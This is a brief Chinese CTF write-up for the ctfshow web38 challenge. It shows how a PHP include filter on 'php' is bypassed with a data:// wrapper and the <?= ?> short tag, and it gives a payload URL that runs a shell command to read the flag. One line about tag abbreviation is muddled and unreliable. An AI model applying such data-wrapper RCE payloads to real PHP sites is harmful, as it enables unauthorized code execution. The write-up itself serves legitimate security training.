查看源代码发现对比上一题只是多了对PHP的过滤,对PHP的过滤影响到的是data协议rce时<?PHP语句的构造
不过<?PHP system(‘ls’);?>
是可以简写将PHP省略的 <?PHP system(‘ls’);>
等于 <?=system(‘ls’);?>
这是作者的一个小实验:
构造payload
http://f5d8e458-5d09-4ed5-aba4-98ddda953a5b.challenge.ctf.show:8080/?c=data:text/plain,<?=system('tac fla*');?>
总结 以上是内存溢出为你收集整理的Ctfshow web入门-web38 WP全部内容,希望文章能够帮你解决Ctfshow web入门-web38 WP所遇到的程序开发问题。
如果觉得内存溢出网站内容还不错,欢迎将内存溢出网站推荐给程序员好友。
欢迎分享,转载请注明来源:内存溢出
评论列表(0条)